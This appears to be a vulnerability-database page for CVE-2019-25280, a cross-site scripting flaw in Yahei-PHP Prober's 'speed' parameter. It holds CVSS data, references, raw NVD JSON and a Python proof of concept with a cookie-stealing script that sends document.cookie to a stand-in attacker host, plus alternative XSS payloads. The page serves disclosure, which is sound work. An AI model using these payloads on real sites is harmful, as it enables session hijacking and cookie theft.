Security Vulnerability Report
CVE-2019-25280 CVSS 6.1 MEDIUM

CVE-2019-25280

Published: 2026-01-08 00:15:58
Last Modified: 2026-04-15 00:35:42

Description

Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Yahei-PHP Prober <= 0.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2019-25280 PoC - Yahei-PHP Prober HTML Injection
# Affected Version: Yahei-PHP Prober <= 0.4.7
# Attack Vector: GET parameter 'speed'
# Impact: Stored XSS, Cookie Theft, Session Hijacking
import requests
from urllib.parse import quote

target_url = "http://target.com/prober.php"

# XSS payload to steal cookies
xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

# Alternative payloads
alt_payloads = [
    '<img src=x onerror=alert(document.cookie)>',
    '<svg onload=alert(1)>',
    '<iframe src="javascript:alert(document.domain)">'
]

# Construct malicious URL
malicious_url = f"{target_url}?speed={quote(xss_payload)}"
print(f"[*] Target: {target_url}")
print(f"[*] Malicious URL: {malicious_url}")
print(f"[*] Payload: {xss_payload}")

# Verify vulnerability
try:
    response = requests.get(malicious_url, timeout=10)
    if xss_payload in response.text:
        print("[+] VULNERABLE: Payload successfully injected")
    else:
        print("[-] Possibly patched or not vulnerable")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")
```

References

Weakness: CWE-79

- https://cxsecurity.com/issue/WLB-2019070132
- https://exchange.xforce.ibmcloud.com/vulnerabilities/164412
- https://packetstormsecurity.com/files/153756
- https://web.archive.org/web/20190623143100/http://www.yahei.net/
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php

Raw JSON Data

```json
{"cve": {"id": "CVE-2019-25280", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:58.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions."}, {"lang": "es", "value": "Yahei-PHP Prober 0.4.7 contiene una vulnerabilidad de inyección HTML remota que permite a los atacantes ejecutar código HTML arbitrario a través del parámetro GET 'speed'. Los atacantes pueden inyectar código HTML malicioso en el parámetro 'speed' de prober.php para desencadenar cross-site scripting en las sesiones del navegador del usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019070132", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/164412", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/153756", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20190623143100/http://www.yahei.net/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2019070132", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```